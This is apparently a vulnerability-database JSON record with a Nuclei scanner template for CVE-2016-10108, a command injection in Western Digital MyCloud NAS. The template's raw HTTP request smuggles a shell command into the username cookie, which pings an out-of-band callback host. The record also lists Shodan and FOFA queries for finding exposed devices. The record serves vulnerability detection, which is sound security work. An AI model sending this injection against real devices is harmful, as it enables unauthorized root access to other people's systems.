{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2016-10108/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2016-10108/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2016-10108/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2016-10108/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2016-10108/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2016-10108"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2016-10108"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2016/CVE-2016-10108.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2016-10108\n\ninfo:\n  name: Western Digital MyCloud NAS - Command Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the entire network.\n  remediation: |\n    Apply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet.\n  reference:\n    - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/\n    - https://nvd.nist.gov/vuln/detail/CVE-2016-10108\n    - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html\n    - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2016-10108\n    cwe-id: CWE-77\n    epss-score: 0.9782\n    epss-percentile: 0.99904\n    cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: western_digital\n    product: mycloud_nas\n    shodan-query: http.favicon.hash:-1074357885\n    fofa-query: icon_hash=-1074357885\n  tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(body, \"WDMyCloud\")\n          - contains(interactsh_protocol, \"dns\")\n          - status_code == 200\n        condition: and\n# digest: 4a0a00473045022100d2c4576a720eedbdbc6c801b1d69d8ec9bebef44938f80052c143532cc713da60220120e9f65dcf0c6a05640306a343ce6e2cf28592e7675b9579d06d20e8c0558e2:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2016-10108"
}